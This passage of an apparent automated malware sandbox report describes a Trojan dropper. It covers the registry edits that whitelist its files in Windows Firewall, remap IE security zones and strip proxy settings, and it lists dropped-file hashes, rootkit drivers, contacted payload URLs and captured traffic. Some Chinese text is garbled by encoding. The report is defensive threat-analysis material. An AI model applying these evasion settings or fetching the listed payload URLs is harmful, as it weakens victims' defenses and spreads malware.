"BaiduAn.exe" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¤Â¸Â»Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"vcredist_x86.exe" = "IExpress Setup"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnSvc.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¦Å“ÂÃ¥Å Â¡Ã§Â¨â€¹Ã¥ÂºÂ"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\updatr]
"oovmdw_70745.exe" = "%Program Files%\updatr\oovmdw_70745.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¥Å“Â¨Ã§ÂºÂ¿Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp]
"snczjmr.dll" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnSvc.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¦Å“ÂÃ¥Å Â¡Ã§Â¨â€¹Ã¥ÂºÂ"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Start" = "2"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\updatr]
"oovmdw_70745.exe" = "%Program Files%\updatr\oovmdw_70745.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¥Å“Â¨Ã§ÂºÂ¿Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnUpdate.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¦â€ºÂ´Ã¦â€“Â°Ã§Â¨â€¹Ã¥ÂºÂ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnTray.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¦â€°ËœÃ§â€ºËœÃ§Â¨â€¹Ã¥ÂºÂ"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnBugRpt.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnBugRpt.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«BUGÃ¤Â¸Å Ã¦Å Â¥Ã§Â¨â€¹Ã¥ÂºÂ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnUpdate.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¦â€ºÂ´Ã¦â€“Â°Ã§Â¨â€¹Ã¥ÂºÂ"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp]
"snczjmr.dll" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnTray.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¦â€°ËœÃ§â€ºËœÃ§Â¨â€¹Ã¥ÂºÂ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnBugRpt.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnBugRpt.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«BUGÃ¤Â¸Å Ã¦Å Â¥Ã§Â¨â€¹Ã¥ÂºÂ"

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\updatr]
"oovmdw_70745.exe"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\updatr]
"oovmdw_70745.exe"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

The process BDASWAcc.exe:316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 F2 B3 4A 22 64 87 3D B8 BF F0 70 A0 30 88 25"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Ainqngz5.2.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Ainqngz5.2.exe"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "Ainqngz5.2.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1404720818"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C E4 B1 42 81 58 CC A4 3D CE 21 29 9B 67 20 D5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
254f13dfd61c5b7d2119eb2550491e1d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\NSISdl.dll
00a0194c20ee912257df53bfe258ee4a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\System.dll
f951a17f9892add6be51b7f84638defe	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\guagua_77150006814.exe
2e02c1bdb46273ef13cb5203576e079f	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\pczh_107_306.exe
44edff85d12e091f0b129f05a3f2a042	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDLogicUtils.dll
d184763cb4e62d531193978de7b82db2	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMDownload.dll
c8b0dca29d7b9aff1b801af86212c586	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMNet.dll
12f98be1d919784370eb0f87e78b60d8	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMNetGetInfo.dll
30cbc602ada7cdfb0346038c05996d84	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMReport.dll
b540a866191f7fd20f5e6355bc2b094e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMSkin.dll
f52eb281e29da8065e18805617ac2cbc	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\System.dll
763b532d651f0ad5e135d9b57bf4fba4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\dl.dll
ebfe7c9594e300bb0c16e7bb99a7e66d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\hu.dll
731e4fd7cbbff12adebb2a4ff8fbe9eb	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\tmpjnmhqw.dll
8d6d78fcc0a17b47f17ce77217ef53a1	c:\Program Files\ainqngz5.2\Ainqngz5.2.exe
151ff53109c38e720e9083e3a4e194f8	c:\Program Files\ainqngz5.2\candid.exe
61dd64b3a469bdcd80a69e8fc084d240	c:\Program Files\ainqngz5.2\schedule.exe
b975774b4cabf39685edf11b68b81dbe	c:\Program Files\ainqngz5.2\uninstall.exe
f06fb28d3a6db3fbd7e462bb6322af56	c:\Program Files\updatr\oovmdw_70745.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\BDMNetMon.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:

ZwUnloadKey

Propagation

VersionInfo

Company Name:
Product Name: ${PRODUCT_NAME}
Product Version: 2014.07.27.150521
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23488	23552	4.48909	7ebfade271f75cb4c180603ab653af42
.rdata	28672	4496	4608	3.59139	9d6e96915262c9d1129a16fa0b02a19a
.data	36864	110456	1024	3.27356	dbf10679c897d0edeee280fffdad552f
.ndata	147456	40960	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	188416	85928	86016	2.16541	7a3cef6cadf59571c6209964d6cb3669

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 22
368df8ed3d7141cc7ceffb26a2220d74
b7689ef7d3c4763c76a43221bfc6d0b9
c81fd7ef721e6c7a1f0203dde813d244
6ca00e4606c195020cd39b59358b36a4
3b0128153a6b94307ca762112e1439d2
e77107291973bca380acd284c9b0a503
da49e83d0dd978c365612224ee558f21
36ff06cf8a6a849d240584b5af5f02ed
d1439abfdf73e0edf0811ffa74e4fd49
d217ec6e342146f4a002f71f34db95c3
71492741cbef0abc94944bcf6cb49aab
65254cf883d5964ce96d5b8633c76ffd
0eca26def7e361c36194aca94c4e5dd3
54287af5e0e8a6efda423312017ce223
30a86dc2c4792eacd946e46e1960bc89
ca824e896166c1da44e2ee134cd552d0
cd8831c8413def45cac4b8e146b4f8d2
959aa7b2a0ed301db047fb37268d62f0
3c67cf4665617d0c117061f12e31c456
a94bdb6aac01bffc342c236c4734941d
91b87c94c11a3b03dc3202f2e8ce5ff8
644a849240ab75128e2cf0985ec99585

URLs

URL	IP
hxxp://yunbo.luopf.cn/app.txt	61.160.251.6
hxxp://yunbo.luopf.cn/guagua_77150006814.zip	61.160.251.6
hxxp://pxsw.n.shifen.com/
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllw5/BDLogicUtils.dll
hxxp://swdownload.jomodns.com/sw-search-sp/client2/common/patch/19562458020/BDLogicUtils.dll
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllv5/BDMReport.dll
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/BDMReport.dll
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllv3/BDMReport.dll
hxxp://swdownload.jomodns.com/sw-search-shadu/client/dllv3/BDMReport.dll
hxxp://swdownload.jomodns.com/sw-search-sp/client2/common/patch/19035267599/BDMReport.dll
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllws/BDMNet.dll
hxxp://yunbo.luopf.cn/pczh_107_306.zip	61.160.251.6
hxxp://sxsw.n.shifen.com/
hxxp://admin.downloader.re63.cn/downcontainer/downLoadList.do	122.226.104.80
hxxp://admin.downloader.re63.cn/downcontainer/downLoadForGuaGua.do?recid=77150006814	122.226.104.80
hxxp://swdownload.jomodns.com/sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll
hxxp://img001.com/tg_pic/1.png	36.250.9.8
hxxp://admin.downloader.re63.cn/downloader/start?dlver=G1.0.0&pname=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid=	122.226.104.80
hxxp://img001.com/tg_pic/2.png	36.250.9.8
hxxp://img001.com/tg_pic/3.png	36.250.9.8
hxxp://img001.com/tg_pic/4.png	36.250.9.8
hxxp://img001.com/tg_pic/5.png	36.250.9.8
hxxp://img001.com/tg_pic/mobo14-1-9.png	36.250.9.8
hxxp://yunbo.luopf.cn/wwwww_3340.zip	61.160.251.6
hxxp://c01.i06.arnic.hadns.net/0403/help1.html
hxxp://c01.i06.arnic.hadns.net/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=
hxxp://sxcdn.kukuplay.com/support/mini/fyminiloader-min.js
hxxp://c.split.cnzz.com/stat.php?id=2701879&web_id=2701879
hxxp://dft.nc.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
hxxp://c.split.cnzz.com/core.php?web_id=2701879&t=z
hxxp://z10.cnzz.com/stat.htm?id=2701879&r=&lg=en-us&ntime=none&cnzz_eid=1584515375-1408242084-&showp=1276x846&t=&h=1&rnd=1072095621
hxxp://pcookie.split.cnzz.com/9.gif?abc=1&rnd=135011660
hxxp://dft.nc.fengyunzhibo.com/
hxxp://pcookie.split.cnzz.com/app.gif?&cna=pv92DG xUBsCAcGK9OdTDULL
hxxp://static.m0dlcdn.kukuplay.com/support/mini/fyminiloader-min.js	183.203.15.245
hxxp://dlsw.baidu.com/sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll	180.76.22.47
hxxp://dlsw.baidu.com/sw-search-sp/client2/common/patch/19035267599/BDMReport.dll	180.76.22.47
hxxp://p.x.baidu.com/	123.125.65.152
hxxp://c.cnzz.com/core.php?web_id=2701879&t=z	42.120.219.6
hxxp://dl1sw.baidu.com/client/dllws/BDMNet.dll	8.37.234.10
hxxp://dlsw.baidu.com/sw-search-sp/client2/common/patch/19562458020/BDLogicUtils.dll	180.76.22.47
hxxp://dl1sw.baidu.com/client/dllv5/BDMReport.dll	8.37.234.10
hxxp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=	222.186.20.122
hxxp://dl1sw.baidu.com/client/dllw5/BDLogicUtils.dll	8.37.234.10
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=135011660	42.120.219.171
hxxp://dl1sw.baidu.com/client/BDMReport.dll	8.37.234.10
hxxp://s.x.baidu.com/	180.76.2.46
hxxp://dlsw.baidu.com/sw-search-shadu/client/dllv3/BDMReport.dll	180.76.22.47
hxxp://update.aiqingzhihui.com/0403/help1.html	218.76.217.140
hxxp://s6.cnzz.com/stat.php?id=2701879&web_id=2701879	1.99.192.15
hxxp://cj.guagua.cn/downloader/start?dlver=G1.0.0&pname=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid=	122.226.104.80
hxxp://hzs17.cnzz.com/stat.htm?id=2701879&r=&lg=en-us&ntime=none&cnzz_eid=1584515375-1408242084-&showp=1276x846&t=&h=1&rnd=1072095621	42.156.140.23
hxxp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null	1.99.192.17
hxxp://dl1sw.baidu.com/client/dllv3/BDMReport.dll	8.37.234.10
dtrp.download.iyuntian.com	123.125.65.150
pcookie.cnzz.com	42.120.219.171
www.fengyunzhibo.com	115.231.18.11
jp.download.iyuntian.com	123.125.65.154
cfg.download.iyuntian.com	123.125.65.132
res.download.iyuntian.com	123.125.65.129
tk.download.iyuntian.com	123.125.69.209
rc.download.iyuntian.com	123.125.65.153
utk.download.iyuntian.com	123.125.65.147

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.

Traffic

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=20316160-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:58 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 5688144<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127219<br>

Content-Range: bytes 20316160-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

